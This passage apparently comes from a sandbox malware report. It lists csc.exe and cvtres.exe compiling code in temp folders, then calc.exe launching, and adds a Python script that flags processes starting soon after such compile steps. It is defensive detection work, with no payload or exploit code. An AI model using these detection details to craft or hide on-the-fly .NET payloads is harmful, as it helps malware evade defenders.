                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:02:03:11
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:43176 bytes
                                                                                                                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:02:03:48
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\SysWOW64\calc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\system32\calc.exe"
                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                  File size:26112 bytes
                                                                                                                                                                  MD5 hash:0975EE4BD09E87C94861F69E4AA44B7A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  Target ID:32
                                                                                                                                                                  Start time:02:03:49
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                                                                                                                  Imagebase:0x7ff7a38a0000
                                                                                                                                                                  File size:4369920 bytes
                                                                                                                                                                  MD5 hash:79DAE866D55C1BA452E1B19721F67C1F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  Target ID:33
                                                                                                                                                                  Start time:02:03:49
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:2170976 bytes
                                                                                                                                                                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                                                  Target ID:34
                                                                                                                                                                  Start time:02:03:54
                                                                                                                                                                  Start date:18/08/2022
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:43176 bytes
                                                                                                                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  No disassembly
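The process list above is the trace that the "Compiles C# or VB.Net code" signature fires on: csc.exe is driven with a response file at %LOCALAPPDATA%\Temp\<8 random chars>\<same 8 chars>.cmdline, cvtres.exe then runs on the same temp directory with a RES*.tmp output and a CSC<32 hex>.TMP resource file, and a few seconds later an unrelated process (calc.exe, then the Calculator store app) starts. That is the shape of .NET CodeDom on-the-fly compilation followed by execution of the compiled payload. The following detection is an added example written for this page, not part of the Joe Sandbox report or its signatures. This section of the report gives no parent process IDs, so the logic keys on command-line shape and start-time proximity only; the sample records are constructed from the start times and command lines listed above, and the last two rows are constructed benign controls that should not fire.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample records: (start time, image path, command line), taken from
# the process list above. The final two rows are constructed benign controls:
# an unrelated process well outside the time window, and a csc.exe run from a
# build tree rather than from %LOCALAPPDATA%\Temp.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("02:03:05", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"'),
    ("02:03:09", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline'),
    ("02:03:11", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"'),
    ("02:03:48", r"C:\Windows\SysWOW64\calc.exe", r'"C:\Windows\system32\calc.exe"'),
    ("02:03:49", r"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe",
     r'"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca'),
    ("02:03:49", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline'),
    ("02:03:54", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"'),
    # Constructed benign controls (not from the report).
    ("02:05:30", r"C:\Windows\explorer.exe", r'"C:\Windows\explorer.exe"'),
    ("02:10:00", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\src\app\obj\Release\app.cmdline"'),
]

# CodeDom compile step 1: csc.exe fed a response file named
# %LOCALAPPDATA%\Temp\<8 chars>\<same 8 chars>.cmdline. The backreference
# enforces that the file name repeats the directory name.
CSC_CODEDOM = re.compile(
    r'/noconfig\s+/fullpaths\s+@"?[^"]*\\AppData\\Local\\Temp\\([a-z0-9]{8})\\\1\.cmdline', re.I)

# CodeDom compile step 2: cvtres.exe writing RES<hex>.tmp in Temp and reading
# CSC<32 hex>.TMP from the same 8-character temp directory.
CVTRES_CODEDOM = re.compile(
    r'/OUT:[^"]*\\AppData\\Local\\Temp\\RES[0-9A-F]+\.tmp"\s+"[^"]*\\AppData\\Local\\Temp\\([a-z0-9]{8})\\CSC[0-9A-F]{32}\.TMP', re.I)


def classify(cmdline: str) -> Tuple[str, Optional[str]]:
    """Return (kind, temp_dir): kind is 'csc_codedom', 'cvtres_codedom' or 'other'."""
    m = CSC_CODEDOM.search(cmdline)
    if m:
        return "csc_codedom", m.group(1).lower()
    m = CVTRES_CODEDOM.search(cmdline)
    if m:
        return "cvtres_codedom", m.group(1).lower()
    return "other", None


def _t(hhmmss: str) -> datetime:
    return datetime.strptime(hhmmss, "%H:%M:%S")


def correlate(events: List[Tuple[str, str, str]], window_s: int = 60) -> Dict[str, object]:
    """Group CodeDom compile steps by temp directory and flag every other
    process that starts within window_s seconds after any compile step."""
    ordered = sorted(events, key=lambda e: _t(e[0]))  # stable: ties keep input order
    compile_dirs: Dict[str, List[str]] = {}
    compile_times: List[datetime] = []
    flagged: List[Dict[str, object]] = []
    for start, image, cmdline in ordered:
        kind, tmpdir = classify(cmdline)
        if kind != "other":
            compile_dirs.setdefault(tmpdir, []).append(kind)
            compile_times.append(_t(start))
            continue
        t = _t(start)
        recent = [ct for ct in compile_times if 0 <= (t - ct).total_seconds() <= window_s]
        if recent:
            flagged.append({
                "start": start,
                "image": image,
                "seconds_after_compile": int((t - max(recent)).total_seconds()),
            })
    return {"compile_dirs": compile_dirs, "flagged": flagged}


def run_sample() -> Dict[str, object]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    result = run_sample()
    for d, steps in result["compile_dirs"].items():
        print(f"CodeDom compile in Temp\\{d}: {', '.join(steps)}")
    for f in result["flagged"]:
        print(f"ALERT {f['start']} {f['image']} started {f['seconds_after_compile']}s after a compile step")
```

On the report's records this yields three compile directories (5pliokiz, whose csc.exe step is above the portion of the list shown here, h34ip5a5 and v2wr4cux) and flags calc.exe and Calculator.exe; the two benign controls stay quiet. In a real telemetry pipeline the parent process (msdt.exe or sdiagnhost.exe in a Follina chain) is the stronger signal and should be joined in before alerting; the time-window heuristic here is only a fallback for logs that, like this section of the report, lack parent PIDs.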